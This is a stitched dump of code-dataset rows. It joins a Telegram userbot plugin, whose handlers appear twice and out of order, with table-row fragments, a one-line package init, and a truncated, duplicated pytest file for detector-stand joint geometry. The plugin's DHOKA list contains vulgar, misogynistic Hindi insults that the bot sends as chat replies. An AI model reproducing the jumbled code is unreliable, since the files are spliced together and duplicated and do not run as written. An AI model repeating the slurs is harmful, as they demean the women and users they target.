@bot.on(admin_cmd(pattern="gdnoon$", outgoing=True))
@bot.on(sudo_cmd(pattern="gdnoon$", allow_sudo=True))
async def noon(e):
    """.gdnoon -- edit/reply with a random quote from GDNOON.

    Fix: dropped the pointless f-string prefix on the pattern (F541).
    """
    await edit_or_reply(e, random.choice(GDNOON))
@bot.on(admin_cmd(pattern="chase$", outgoing=True))
@bot.on(sudo_cmd(pattern="chase$", allow_sudo=True))
async def police(e):
    """.chase -- edit/reply with a random quote from CHASE_STR.

    Fix: dropped the pointless f-string prefix on the pattern (F541).
    """
    await edit_or_reply(e, random.choice(CHASE_STR))
@bot.on(admin_cmd(pattern="congo$", outgoing=True))
@bot.on(sudo_cmd(pattern="congo$", allow_sudo=True))
async def Sahih(e):
    """.congo -- edit/reply with a random quote from CONGRATULATION.

    Fix: dropped the pointless f-string prefix on the pattern (F541).
    """
    await edit_or_reply(e, random.choice(CONGRATULATION))
@bot.on(admin_cmd(pattern="qhi$", outgoing=True))
@bot.on(sudo_cmd(pattern="qhi$", allow_sudo=True))
async def hoi(e):
    """.qhi -- edit/reply with a random greeting from eviralOSTR.

    Fix: dropped the pointless f-string prefix on the pattern (F541).
    """
    await edit_or_reply(e, random.choice(eviralOSTR))
@bot.on(admin_cmd(pattern="gdbye$", outgoing=True))
@bot.on(sudo_cmd(pattern="gdbye$", allow_sudo=True))
async def bhago(e):
    """.gdbye -- edit/reply with a random farewell from BYESTR.

    Fix: dropped the pointless f-string prefix on the pattern (F541).
    """
    await edit_or_reply(e, random.choice(BYESTR))
@bot.on(admin_cmd(pattern="gdnyt$", outgoing=True))
@bot.on(sudo_cmd(pattern="gdnyt$", allow_sudo=True))
async def night(e):
    """.gdnyt -- edit/reply with a random quote from GDNIGHT.

    Fix: dropped the pointless f-string prefix on the pattern (F541).
    """
    await edit_or_reply(e, random.choice(GDNIGHT))
@bot.on(admin_cmd(pattern="gdmng$", outgoing=True))
@bot.on(sudo_cmd(pattern="gdmng$", allow_sudo=True))
async def morning(e):
    """.gdmng -- edit/reply with a random quote from GDMORNING.

    Fix: dropped the pointless f-string prefix on the pattern (F541).
    """
    await edit_or_reply(e, random.choice(GDMORNING))
@bot.on(admin_cmd(pattern="quote ?(.*)", outgoing=True))
@bot.on(sudo_cmd(pattern="quote ?(.*)", allow_sudo=True))
async def quote_search(event):
    """.quote -- random quote; .quote <term> -- search the quote API.

    Fixes: the two bare ``except:`` clauses also swallowed SystemExit and
    KeyboardInterrupt (narrowed to Exception), and ``requests.get`` had no
    timeout, so a stalled API call would hang the handler forever.
    """
    if event.fwd_from:
        return
    catevent = await edit_or_reply(event, "`Processing...`")
    input_str = event.pattern_match.group(1)
    if not input_str:
        api_url = "https://quotes.cwprojects.live/random"
        try:
            response = requests.get(api_url, timeout=10).json()
        except Exception:  # network/JSON errors -> treated as "no result"
            response = None
    else:
        api_url = f"https://quotes.cwprojects.live/search/query={input_str}"
        try:
            # random.choice raises IndexError on an empty result list,
            # which is caught below and reported as "no result".
            response = random.choice(requests.get(api_url, timeout=10).json())
        except Exception:
            response = None
    if response is not None:
        await catevent.edit(f"`{response['text']}`")
    else:
        await edit_or_reply(catevent, "`Sorry Zero results found`", 5)
# Register every command of this plugin with the in-bot .help system.
CmdHelp("quotes").add_command(
    "quote", None, "Sends a random mind-blowing quote"
).add_command("gdmng", None, "Sends a random Good Morning Quote").add_command(
    "gdnyt", None, "Sends a random Good Night Quote"
).add_command(
    "gdbye", None, "Sends a random Good Byee Quote"
).add_command(
    "qhi", None, "Sends a random hello msg"
).add_command(
    "congo", None, "Sends a random congratulations quote"
).add_command(
    "chase", None, "Sends a random Chase quote"
).add_command(
    "gdnoon", None, "Sends a random Good Afternoon quote"
).add_command(
    "metoo", None, 'Sends a text saying "Mee too"'
).add_command(
    "dhoka", None, "Sends a random Dhoka quote(katt gya bc)"
).add_command(
    "love", None, "Sends a random love quote🥰. (A stage before .dhoka)"
).add()
| import random
import requests
from FIREX.utils import admin_cmd, edit_or_reply, sudo_cmd
from userbot.cmdhelp import CmdHelp
LOVESTR = [
"The best and most beautiful things in this world cannot be seen or even heard, but must be felt with the heart.",
"You know you're in love when you can't fall asleep because reality is finally better than your dreams.",
"Love recognizes no barriers. It jumps hurdles, leaps fences, penetrates walls to arrive at its destination full of hope.",
"Being deeply loved by someone gives you strength, while loving someone deeply gives you courage.",
"The real lover is the man who can thrill you by kissing your forehead or smiling into your eyes or just staring into space.",
"I swear I couldn't love you more than I do right now, and yet I know I will tomorrow.",
"When I saw you I fell in love, and you smiled because you knew it.",
"In all the world, there is no heart for me like yours. / In all the world, there is no love for you like mine.",
"To love or have loved, that is enough. Ask nothing further. There is no other pearl to be found in the dark folds of life.",
"If you live to be a hundred, I want to live to be a hundred minus one day, so I never have to live without you.",
"Some love stories aren't epic novels. Some are short stories. But that doesn't make them any less filled with love.",
"As he read, I fell in love the way you fall asleep: slowly, and then all at once.",
"I've never had a moment's doubt. I love you. I believe in you completely. You are my dearest one. My reason for life.",
"Do I love you? My god, if your love were a grain of sand, mine would be a universe of beaches.",
"I am who I am because of you.",
"I just want you to know that you're very special... and the only reason I'm telling you is that I don't know if anyone else ever has.",
"Remember, we're madly in love, so it's all right to kiss me any time you feel like it.",
"I love you. I knew it the minute I met you.",
"I loved her against reason, against promise, against peace, against hope, against happiness, against all discouragement that could be.",
"I love you not because of who you are, but because of who I am when I am with you.",
]
DHOKA = [
"Humne Unse Wafa Ki, Aur Dil Bhi Gya Toot, Wo Bhi Chinaal Nikli, Uski Maa ki Chut.",
"Dabbe Me Dabba, Dabbe Me Cake ..Tu Chutiya Hai Zara Seesha To Dekh.",
"Kaam Se Kaam Rakhoge Toh Naam Hoga, Randi Log Ke Chakkkar Me Padoge to Naam Badnaam Hoga.",
"Usne Kaha- Mah Lyf maH Rule, Maine Kaha Bhag BSDK , Tujhy Paida Karna hi Teri Baap ki Sabse Badi Vul.",
"Humse Ulajhna Mat, BSDK Teri Hasi Mita Dunga, Muh Me Land Daal Ke..Sari Hosiyaari Gand Se Nikal Dunga.",
"Aur Sunau Bhosdiwalo ..Kya Haal Hai?..Tumhare Sakal Se Zayda Toh Tumhare Gand Laal Hai!!",
"Pata Nhi Kya Kashish Hai Tumhare Mohabbat Me,Jab Bhi Tumhe Yaad Karta Hu Mera Land Khada Ho Jata Hai.",
"Konsa Mohabbat Kounsi Story, Gand Faad Dunga Agr Bolne Aayi Sorry!",
"Naam Banta Hai Risk Se, Chutiya Banta Hai IshQ Se.",
"Sun Be, Ab Tujhy Mere Zindegi Me Ane ka Koi Haq Nhi,,Aur Tu 1 Number Ki Randi Hai Isme KOi Saq Nhi.",
"Beta Tu Chugli Karna Chor De , Hum Ungli Karna Chor Dengy.",
]
# Canned "me too" replies; the .metoo handler picks one of these at random.
METOOSTR = [
    "Me too thanks",
    "Haha yes, me too",
    "Same lol",
    "Me irl",
    "Same here",
    "Haha yes",
    "Me rn",
]
GDNOON = [
"`My wishes will always be with you, Morning wish to make you feel fresh, Afternoon wish to accompany you, Evening wish to refresh you, Night wish to comfort you with sleep, Good Afternoon Dear!`",
"`With a deep blue sky over my head and a relaxing wind around me, the only thing I am missing right now is the company of you. I wish you a refreshing afternoon!`",
"`The day has come a halt realizing that I am yet to wish you a great afternoon. My dear, if you thought you were forgotten, you’re so wrong. Good afternoon!`",
"`Good afternoon! May the sweet peace be part of your heart today and always and there is life shining through your sigh. May you have much light and peace.`",
"`With you, every part of a day is beautiful. I live every day to love you more than yesterday. Wishing you an enjoyable afternoon my love!`",
"`This bright afternoon sun always reminds me of how you brighten my life with all the happiness. I miss you a lot this afternoon. Have a good time`!",
"`Nature looks quieter and more beautiful at this time of the day! You really don’t want to miss the beauty of this time! Wishing you a happy afternoon!`",
"`What a wonderful afternoon to finish you day with! I hope you’re having a great time sitting on your balcony, enjoying this afternoon beauty!`",
"`I wish I were with you this time of the day. We hardly have a beautiful afternoon like this nowadays. Wishing you a peaceful afternoon!`",
"`As you prepare yourself to wave goodbye to another wonderful day, I want you to know that, I am thinking of you all the time. Good afternoon!`",
"`This afternoon is here to calm your dog-tired mind after a hectic day. Enjoy the blessings it offers you and be thankful always. Good afternoon!`",
"`The gentle afternoon wind feels like a sweet hug from you. You are in my every thought in this wonderful afternoon. Hope you are enjoying the time!`",
"`Wishing an amazingly good afternoon to the most beautiful soul I have ever met. I hope you are having a good time relaxing and enjoying the beauty of this time!`",
"`Afternoon has come to indicate you, Half of your day’s work is over, Just another half a day to go, Be brisk and keep enjoying your works, Have a happy noon!`",
"`Mornings are for starting a new work, Afternoons are for remembering, Evenings are for refreshing, Nights are for relaxing, So remember people, who are remembering you, Have a happy noon!`",
"`If you feel tired and sleepy you could use a nap, you will see that it will help you recover your energy and feel much better to finish the day. Have a beautiful afternoon!`",
"`Time to remember sweet persons in your life, I know I will be first on the list, Thanks for that, Good afternoon my dear!`",
"`May this afternoon bring a lot of pleasant surprises for you and fills you heart with infinite joy. Wishing you a very warm and love filled afternoon!`",
"`Good, better, best. Never let it rest. Til your good is better and your better is best. “Good Afternoon`”",
"`May this beautiful afternoon fill your heart boundless happiness and gives you new hopes to start yours with. May you have lot of fun! Good afternoon dear!`",
"`As the blazing sun slowly starts making its way to the west, I want you to know that this beautiful afternoon is here to bless your life with success and peace. Good afternoon!`",
"`The deep blue sky of this bright afternoon reminds me of the deepness of your heart and the brightness of your soul. May you have a memorable afternoon!`",
"`Your presence could make this afternoon much more pleasurable for me. Your company is what I cherish all the time. Good afternoon!`",
"`A relaxing afternoon wind and the sweet pleasure of your company can make my day complete. Missing you so badly during this time of the day! Good afternoon!`",
"`Wishing you an afternoon experience so sweet and pleasant that feel thankful to be alive today. May you have the best afternoon of your life today!`",
"`My wishes will always be with you, Morning wish to make you feel fresh, Afternoon wish to accompany you, Evening wish to refresh you, Night wish to comfort you with sleep, Good afternoon dear!`",
"`Noon time – it’s time to have a little break, Take time to breathe the warmth of the sun, Who is shining up in between the clouds, Good afternoon!`",
"`You are the cure that I need to take three times a day, in the morning, at the night and in the afternoon. I am missing you a lot right now. Good afternoon!`",
"`I want you when I wake up in the morning, I want you when I go to sleep at night and I want you when I relax under the sun in the afternoon!`",
"`I pray to god that he keeps me close to you so we can enjoy these beautiful afternoons together forever! Wishing you a good time this afternoon!`",
"`You are every bit of special to me just like a relaxing afternoon is special after a toiling noon. Thinking of my special one in this special time of the day!`",
"`May your Good afternoon be light, blessed, enlightened, productive and happy.`",
"`Thinking of you is my most favorite hobby every afternoon. Your love is all I desire in life. Wishing my beloved an amazing afternoon!`",
"`I have tasted things that are so sweet, heard words that are soothing to the soul, but comparing the joy that they both bring, I’ll rather choose to see a smile from your cheeks. You are sweet. I love you.`",
"`How I wish the sun could obey me for a second, to stop its scorching ride on my angel. So sorry it will be hot there. Don’t worry, the evening will soon come. I love you.`",
"`I want you when I wake up in the morning, I want you when I go to sleep at night and I want you when I relax under the sun in the afternoon!`",
"`With you every day is my lucky day. So lucky being your love and don’t know what else to say. Morning night and noon, you make my day.`",
"`Your love is sweeter than what I read in romantic novels and fulfilling more than I see in epic films. I couldn’t have been me, without you. Good afternoon honey, I love you!`",
"`No matter what time of the day it is, No matter what I am doing, No matter what is right and what is wrong, I still remember you like this time, Good Afternoon!`",
"`Things are changing. I see everything turning around for my favor. And the last time I checked, it’s courtesy of your love. 1000 kisses from me to you. I love you dearly and wishing you a very happy noon.`",
"`You are sometimes my greatest weakness, you are sometimes my biggest strength. I do not have a lot of words to say but let you make sure, you make my day, Good Afternoon!`",
"`Every afternoon is to remember the one whom my heart beats for. The one I live and sure can die for. Hope you doing good there my love. Missing your face.`",
"`My love, I hope you are doing well at work and that you remember that I will be waiting for you at home with my arms open to pamper you and give you all my love. I wish you a good afternoon!`",
"`Afternoons like this makes me think about you more. I desire so deeply to be with you in one of these afternoons just to tell you how much I love you. Good afternoon my love!`",
"`My heart craves for your company all the time. A beautiful afternoon like this can be made more enjoyable if you just decide to spend it with me. Good afternoon!`",
]
CHASE_STR = [
"Where do you think you're going?",
"Huh? what? did they get away?",
"ZZzzZZzz... Huh? what? oh, just them again, nevermind.",
"`Get back here!`",
"`Not so fast...`",
"Look out for the wall!",
"Don't leave me alone with them!!",
"You run, you die.",
"`Jokes on you, I'm everywhere`",
"You're gonna regret that...",
"You could also try /kickme, I hear that's fun.",
"`Go bother someone else, no-one here cares.`",
"You can run, but you can't hide.",
"Is that all you've got?",
"I'm behind you...",
"You've got company!",
"We can do this the easy way, or the hard way.",
"You just don't get it, do you?",
"Yeah, you better run!",
"Please, remind me how much I care?",
"I'd run faster if I were you.",
"That's definitely the droid we're looking for.",
"May the odds be ever in your favour.",
"Famous last words.",
"And they disappeared forever, never to be seen again.",
'"Oh, look at me! I\'m so cool, I can run from a bot!" - this person',
"Yeah yeah, just tap /kickme already.",
"Here, take this ring and head to Mordor while you're at it.",
"eviral has it, they're still running...",
"Unlike Harry Potter, your parents can't protect you from me.",
"Fear leads to anger. Anger leads to hate. Hate leads to suffering. If you keep running in fear, you might "
"be the next Vader.",
"Multiple calculations later, I have decided my interest in your shenanigans is exactly 0.",
"eviral has it, they're still running.",
"Keep it up, not sure we want you here anyway.",
"You're a wiza- Oh. Wait. You're not Harry, keep moving.",
"NO RUNNING IN THE HALLWAYS!",
"Hasta la vista, baby.",
"Who let the dogs out?",
"It's funny, because no one cares.",
"Ah, what a waste. I liked that one.",
"Frankly, my dear, I don't give a damn.",
"My milkshake brings all the boys to yard... So run faster!",
"You can't HANDLE the truth!",
"A long time ago, in a galaxy far far away... Someone would've cared about that. Not anymore though.",
"Hey, look at them! They're running from the inevitable banhammer... Cute.",
"Han shot first. So will I.",
"What are you running after, a white rabbit?",
"As The Doctor would say... RUN!",
]
eviralOSTR = [
"Hi !",
"‘Ello, gov'nor!",
"What’s crackin’?",
"Howdy, howdy ,howdy!",
"hello, who's there, I'm talking.",
"You know who this is.",
"Yo!",
"Whaddup.",
"Greetings and salutations!",
"hello, sunshine!",
"`Hey, howdy, hi!`",
"What’s kickin’, little chicken?",
"Peek-a-boo!",
"Howdy-doody!",
"`Hey there, freshman!`",
"`I come in peace!`",
"`I come for peace!`",
"Ahoy, matey!",
"`Hi !`",
]
# Congratulation messages (Telegram monospace markdown); used by .congo.
CONGRATULATION = [
    "`Congratulations and BRAVO!`",
    "`You did it! So proud of you!`",
    "`This calls for celebrating! Congratulations!`",
    "`I knew it was only a matter of time. Well done!`",
    "`Congratulations on your well-deserved success.`",
    "`Heartfelt congratulations to you.`",
    "`Warmest congratulations on your achievement.`",
    "`Congratulations and best wishes for your next adventure!”`",
    "`So pleased to see you accomplishing great things.`",
    "`Feeling so much joy for you today. What an impressive achievement!`",
]
# Goodbye messages (Telegram monospace markdown); used by .gdbye.
BYESTR = [
    "`Nice talking with you`",
    "`I've gotta go!`",
    "`I've gotta run!`",
    "`I've gotta split`",
    "`I'm off!`",
    "`Great to see you,bye`",
    "`See you soon`",
    "`Farewell!`",
]
GDNIGHT = [
"`Good night keep your dreams alive`",
"`Night, night, to a dear friend! May you sleep well!`",
"`May the night fill with stars for you. May counting every one, give you contentment!`",
"`Wishing you comfort, happiness, and a good night’s sleep!`",
"`Now relax. The day is over. You did your best. And tomorrow you’ll do better. Good Night!`",
"`Good night to a friend who is the best! Get your forty winks!`",
"`May your pillow be soft, and your rest be long! Good night, friend!`",
"`Let there be no troubles, dear friend! Have a Good Night!`",
"`Rest soundly tonight, friend!`",
"`Have the best night’s sleep, friend! Sleep well!`",
"`Have a very, good night, friend! You are wonderful!`",
"`Relaxation is in order for you! Good night, friend!`",
"`Good night. May you have sweet dreams tonight.`",
"`Sleep well, dear friend and have sweet dreams.`",
"`As we wait for a brand new day, good night and have beautiful dreams.`",
"`Dear friend, I wish you a night of peace and bliss. Good night.`",
"`Darkness cannot last forever. Keep the hope alive. Good night.`",
"`By hook or crook you shall have sweet dreams tonight. Have a good night, buddy!`",
"`Good night, my friend. I pray that the good Lord watches over you as you sleep. Sweet dreams.`",
"`Good night, friend! May you be filled with tranquility!`",
"`Wishing you a calm night, friend! I hope it is good!`",
"`Wishing you a night where you can recharge for tomorrow!`",
"`Slumber tonight, good friend, and feel well rested, tomorrow!`",
"`Wishing my good friend relief from a hard day’s work! Good Night!`",
"`Good night, friend! May you have silence for sleep!`",
"`Sleep tonight, friend and be well! Know that you have done your very best today, and that you will do your very best, tomorrow!`",
"`Friend, you do not hesitate to get things done! Take tonight to relax and do more, tomorrow!`",
"`Friend, I want to remind you that your strong mind has brought you peace, before. May it do that again, tonight! May you hold acknowledgment of this with you!`",
"`Wishing you a calm, night, friend! Hoping everything winds down to your liking and that the following day meets your standards!`",
"`May the darkness of the night cloak you in a sleep that is sound and good! Dear friend, may this feeling carry you through the next day!`",
"`Friend, may the quietude you experience tonight move you to have many more nights like it! May you find your peace and hold on to it!`",
"`May there be no activity for you tonight, friend! May the rest that you have coming to you arrive swiftly! May the activity that you do tomorrow match your pace and be all of your own making!`",
"`When the day is done, friend, may you know that you have done well! When you sleep tonight, friend, may you view all the you hope for, tomorrow!`",
"`When everything is brought to a standstill, friend, I hope that your thoughts are good, as you drift to sleep! May those thoughts remain with you, during all of your days!`",
"`Every day, you encourage me to do new things, friend! May tonight’s rest bring a new day that overflows with courage and exciting events!`",
]
GDMORNING = [
"`Life is full of uncertainties. But there will always be a sunrise after every sunset. Good morning!`",
"`It doesn’t matter how bad was your yesterday. Today, you are going to make it a good one. Wishing you a good morning!`",
"`If you want to gain health and beauty, you should wake up early. Good morning!`",
"`May this morning offer you new hope for life! May you be happy and enjoy every moment of it. Good morning!`",
"`May the sun shower you with blessings and prosperity in the days ahead. Good morning!`",
"`Every sunrise marks the rise of life over death, hope over despair and happiness over suffering. Wishing you a very enjoyable morning today!`",
"`Wake up and make yourself a part of this beautiful morning. A beautiful world is waiting outside your door. Have an enjoyable time!`",
"`Welcome this beautiful morning with a smile on your face. I hope you’ll have a great day today. Wishing you a very good morning!`",
"`You have been blessed with yet another day. What a wonderful way of welcoming the blessing with such a beautiful morning! Good morning to you!`",
"`Waking up in such a beautiful morning is a guaranty for a day that’s beyond amazing. I hope you’ll make the best of it. Good morning!`",
"`Nothing is more refreshing than a beautiful morning that calms your mind and gives you reasons to smile. Good morning! Wishing you a great day.`",
"`Another day has just started. Welcome the blessings of this beautiful morning. Rise and shine like you always do. Wishing you a wonderful morning!`",
"`Wake up like the sun every morning and light up the world your awesomeness. You have so many great things to achieve today. Good morning!`",
"`A new day has come with so many new opportunities for you. Grab them all and make the best out of your day. Here’s me wishing you a good morning!`",
"`The darkness of night has ended. A new sun is up there to guide you towards a life so bright and blissful. Good morning dear!`",
"`Wake up, have your cup of morning tea and let the morning wind freshen you up like a happiness pill. Wishing you a good morning and a good day ahead!`",
"`Sunrises are the best; enjoy a cup of coffee or tea with yourself because this day is yours, good morning! Have a wonderful day ahead.`",
"`A bad day will always have a good morning, hope all your worries are gone and everything you wish could find a place. Good morning!`",
"`A great end may not be decided but a good creative beginning can be planned and achieved. Good morning, have a productive day!`",
"`Having a sweet morning, a cup of coffee, a day with your loved ones is what sets your “Good Morning” have a nice day!`",
"`Anything can go wrong in the day but the morning has to be beautiful, so I am making sure your morning starts beautiful. Good morning!`",
"`Open your eyes with a smile, pray and thank god that you are waking up to a new beginning. Good morning!`",
"`Morning is not only sunrise but A Beautiful Miracle of God that defeats the darkness and spread light. Good Morning.`",
"`Life never gives you a second chance. So, enjoy every bit of it. Why not start with this beautiful morning. Good Morning!`",
"`If you want to gain health and beauty, you should wake up early. Good Morning!`",
"`Birds are singing sweet melodies and a gentle breeze is blowing through the trees, what a perfect morning to wake you up. Good morning!`",
"`This morning is so relaxing and beautiful that I really don’t want you to miss it in any way. So, wake up dear friend. A hearty good morning to you!`",
"`Mornings come with a blank canvas. Paint it as you like and call it a day. Wake up now and start creating your perfect day. Good morning!`",
"`Every morning brings you new hopes and new opportunities. Don’t miss any one of them while you’re sleeping. Good morning!`",
"`Start your day with solid determination and great attitude. You’re going to have a good day today. Good morning my friend!`",
"`Friendship is what makes life worth living. I want to thank you for being such a special friend of mine. Good morning to you!`",
"`A friend like you is pretty hard to come by in life. I must consider myself lucky enough to have you. Good morning. Wish you an amazing day ahead!`",
"`The more you count yourself as blessed, the more blessed you will be. Thank God for this beautiful morning and let friendship and love prevail this morning.`",
"`Wake up and sip a cup of loving friendship. Eat your heart out from a plate of hope. To top it up, a fork full of kindness and love. Enough for a happy good morning!`",
"`It is easy to imagine the world coming to an end. But it is difficult to imagine spending a day without my friends. Good morning.`",
]
@bot.on(admin_cmd(pattern=f"love$", outgoing=True))
@bot.on(sudo_cmd(pattern='love$', allow_sudo=True))
async def love(e):
    """Reply to .love with a random love quote."""
    await edit_or_reply(e, random.choice(LOVESTR))


@bot.on(admin_cmd(pattern=f"dhoka$", outgoing=True))
@bot.on(sudo_cmd(pattern='dhoka$', allow_sudo=True))
async def katgya(e):
    """Reply to .dhoka with a random "dhoka" line."""
    await edit_or_reply(e, random.choice(DHOKA))


@bot.on(admin_cmd(pattern=f"metoo$", outgoing=True))
@bot.on(sudo_cmd(pattern='metoo$', allow_sudo=True))
async def metoo(e):
    """Reply to .metoo with a random "me too" line."""
    await edit_or_reply(e, random.choice(METOOSTR))


@bot.on(admin_cmd(pattern=f"gdnoon$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdnoon$', allow_sudo=True))
async def noon(e):
    """Reply to .gdnoon with a random good-afternoon quote."""
    await edit_or_reply(e, random.choice(GDNOON))


@bot.on(admin_cmd(pattern=f"chase$", outgoing=True))
@bot.on(sudo_cmd(pattern='chase$', allow_sudo=True))
async def police(e):
    """Reply to .chase with a random chase taunt."""
    await edit_or_reply(e, random.choice(CHASE_STR))


@bot.on(admin_cmd(pattern=f"congo$", outgoing=True))
@bot.on(sudo_cmd(pattern='congo$', allow_sudo=True))
async def Sahih(e):
    """Reply to .congo with a random congratulation message."""
    await edit_or_reply(e, random.choice(CONGRATULATION))


@bot.on(admin_cmd(pattern=f"qhi$", outgoing=True))
@bot.on(sudo_cmd(pattern='qhi$', allow_sudo=True))
async def hoi(e):
    """Reply to .qhi with a random greeting."""
    await edit_or_reply(e, random.choice(eviralOSTR))


@bot.on(admin_cmd(pattern=f"gdbye$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdbye$', allow_sudo=True))
async def bhago(e):
    """Reply to .gdbye with a random goodbye line."""
    await edit_or_reply(e, random.choice(BYESTR))


@bot.on(admin_cmd(pattern=f"gdnyt$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdnyt$', allow_sudo=True))
async def night(e):
    """Reply to .gdnyt with a random good-night quote."""
    await edit_or_reply(e, random.choice(GDNIGHT))


@bot.on(admin_cmd(pattern=f"gdmng$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdmng$', allow_sudo=True))
async def morning(e):
    """Reply to .gdmng with a random good-morning quote."""
    await edit_or_reply(e, random.choice(GDMORNING))
@bot.on(admin_cmd(pattern="quote ?(.*)", outgoing=True))
@bot.on(sudo_cmd(pattern="quote ?(.*)", allow_sudo=True))
async def quote_search(event):
    """Fetch a quote from quotes.cwprojects.live and edit it into the chat.

    Without an argument a single random quote is fetched; with an argument
    the search endpoint is queried and one match is picked at random.
    """
    if event.fwd_from:
        return
    catevent = await edit_or_reply(event, "`Processing...`")
    input_str = event.pattern_match.group(1)
    if not input_str:
        api_url = "https://quotes.cwprojects.live/random"
    else:
        api_url = f"https://quotes.cwprojects.live/search/query={input_str}"
    try:
        payload = requests.get(api_url).json()
        # /random returns a single quote object; the search endpoint returns
        # a list of matches, from which one is chosen at random.
        response = random.choice(payload) if input_str else payload
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit still
        # propagate; network errors, invalid JSON and empty search results
        # (random.choice on []) all fall through to the "no result" reply.
        response = None
    if response is not None:
        await catevent.edit(f"`{response['text']}`")
    else:
        await edit_or_reply(catevent, "`Sorry Zero results found`", 5)
# Register this plugin's triggers with the userbot help system so the help
# command can list each quote command with a short description.
CmdHelp("quotes").add_command(
    "quote", None, "Sends a random mind-blowing quote"
).add_command("gdmng", None, "Sends a random Good Morning Quote").add_command(
    "gdnyt", None, "Sends a random Good Night Quote"
).add_command(
    "gdbye", None, "Sends a random Good Byee Quote"
).add_command(
    "qhi", None, "Sends a random hello msg"
).add_command(
    "congo", None, "Sends a random congratulations quote"
).add_command(
    "chase", None, "Sends a random Chase quote"
).add_command(
    "gdnoon", None, "Sends a random Good Afternoon quote"
).add_command(
    "metoo", None, 'Sends a text saying "Mee too"'
).add_command(
    "dhoka", None, "Sends a random Dhoka quote(katt gya bc)"
).add_command(
    "love", None, "Sends a random love quote🥰. (A stage before .dhoka)"
).add()
| none | 1 | 2.369492 | 2 |
celestial/client/system/__init__.py | ams-tech/celestial | 0 | 13531 | from . import cmdline
| from . import cmdline
| none | 1 | 1.089608 | 1 |
tests/test_joints.py | slaclab/pystand | 0 | 13532 | ############
# Standard #
############
import math
###############
# Third Party #
###############
import ophyd
import pytest
##########
# Module #
##########
from detrot import ConeJoint, AngledJoint, StandPoint, Point
from conftest import PseudoMotor
@pytest.fixture(scope='function')
def pseudo_cone():
    """Return a fresh ConeJoint built from two PseudoMotors with a fixed offset."""
    return ConeJoint(slide=PseudoMotor(5),
                     lift=PseudoMotor(10),
                     offset=Point(1, 2, 3))


@pytest.fixture(scope='function')
def pseudo_angle():
    """Return a fresh AngledJoint built from two PseudoMotors with a fixed offset."""
    return AngledJoint(slide=PseudoMotor(5),
                       lift=PseudoMotor(10),
                       offset=Point(1, 2, 3))
def test_cone_joint(pseudo_cone):
    """Vertical alpha maps slide->x and lift->y; horizontal collapses both onto x."""
    #Test Vertical
    pseudo_cone.alpha = math.pi/2.
    assert pytest.approx(pseudo_cone.joint.x) == 5
    assert pytest.approx(pseudo_cone.joint.y) == 10
    #Test Horizontal
    pseudo_cone.alpha= 0
    assert pseudo_cone.joint.x == 15
    assert pseudo_cone.joint.y == 0
def test_cone_invert(pseudo_cone):
    """invert() at 45 degrees recovers the original motor displacements (5, 10)."""
    #Test 45
    pseudo_cone.alpha = math.pi/4.
    assert pseudo_cone.invert((13.07,9.07))[0] == pytest.approx(5,0.1)
    assert pseudo_cone.invert((13.07,9.07))[1] == pytest.approx(10,0.1)
def test_angle_joint(pseudo_angle):
    """AngledJoint.joint swings the lift between y (vertical) and z (horizontal);
    a missing slide zeroes the x component."""
    #Test Vertical
    pseudo_angle.alpha = math.pi/2.
    assert pytest.approx(pseudo_angle.joint.x) == 5
    assert pytest.approx(pseudo_angle.joint.y) == 10
    assert pytest.approx(pseudo_angle.joint.z) == 0
    #Test Horizontal
    pseudo_angle.alpha = 0
    assert pytest.approx(pseudo_angle.joint.x) == 5
    assert pytest.approx(pseudo_angle.joint.y) == 0
    assert pytest.approx(pseudo_angle.joint.z) == 10
    #Test no-slide
    pseudo_angle.slide = None
    assert pytest.approx(pseudo_angle.joint.x) == 0
    assert pytest.approx(pseudo_angle.joint.y) == 0
    assert pytest.approx(pseudo_angle.joint.z) == 10
def test_angle_invert(pseudo_angle):
    """invert() returns a (slide, lift) pair, or a single lift value with no slide."""
    #Test Vertical
    pseudo_angle.alpha = math.pi/2.
    assert pseudo_angle.invert((6,12))[0] == pytest.approx(5,0.1)
    assert pseudo_angle.invert((6,12))[1] == pytest.approx(10,0.1)
    #Test no-slide
    pseudo_angle.slide = None
    assert pseudo_angle.invert((6,12)) == pytest.approx(10,0.1)
def test_position(pseudo_cone):
    """position is the joint location shifted by the (1, 2, 3) offset."""
    pseudo_cone.alpha= 0
    assert pseudo_cone.position == (16, 2, 3)
    pseudo_cone.alpha = math.pi/2.
    assert pseudo_cone.position.x == pytest.approx(6,0.1)
    assert pseudo_cone.position.y == 12
    assert pseudo_cone.position.z == 3
def test_displacement(pseudo_angle):
    """displacement is (slide, lift), degrading to just lift when slide is absent."""
    assert pseudo_angle.displacement == (5,10)
    pseudo_angle.slide = None
    assert pseudo_angle.displacement == 10
def test_set_joint(pseudo_angle):
    """set_joint drives the motors so displacement matches the requested point."""
    #Vertical
    pseudo_angle.alpha = math.pi/2.
    pseudo_angle.set_joint((6,12))
    assert pseudo_angle.displacement[0] == pytest.approx(5,0.1)
    assert pseudo_angle.displacement[1] == pytest.approx(10,0.1)
    #Test no-slide
    pseudo_angle.slide = None
    pseudo_angle.set_joint((6,12))
    assert pseudo_angle.displacement == pytest.approx(10,0.1)
def test_model(pseudo_angle, pseudo_cone):
    """model() mirrors a joint with ophyd SoftPositioners, preserving
    displacement and an absent slide."""
    model = AngledJoint.model(pseudo_angle)
    assert isinstance(model.slide, ophyd.SoftPositioner)
    assert isinstance(model.lift, ophyd.SoftPositioner)
    assert model.displacement == pseudo_angle.displacement
    #Test no slide
    pseudo_angle.slide = None
    model = AngledJoint.model(pseudo_angle)
    # Identity check instead of `== None` (PEP 8 / flake8 E711).
    assert model.slide is None
    assert isinstance(model.lift, ophyd.SoftPositioner)
    assert model.displacement == pseudo_angle.displacement
    #Test cone
    model = ConeJoint.model(pseudo_cone)
    assert isinstance(model.slide, ophyd.SoftPositioner)
    assert isinstance(model.lift, ophyd.SoftPositioner)
    assert model.displacement == pseudo_cone.displacement
def test_stop(pseudo_cone):
    """stop() on a joint forwards the stop request to both of its motors."""
    pseudo_cone.stop()
    pseudo_cone.slide.stop_call.method.assert_called_with()
    pseudo_cone.lift.stop_call.method.assert_called_with()
def test_cmp():
    """Two AngledJoints wrapping the same motor objects compare equal."""
    p1 = PseudoMotor(5)
    p2 = PseudoMotor(10)
    assert AngledJoint(p1,p2) == AngledJoint(p1, p2)
| ############
# Standard #
############
import math
###############
# Third Party #
###############
import ophyd
import pytest
##########
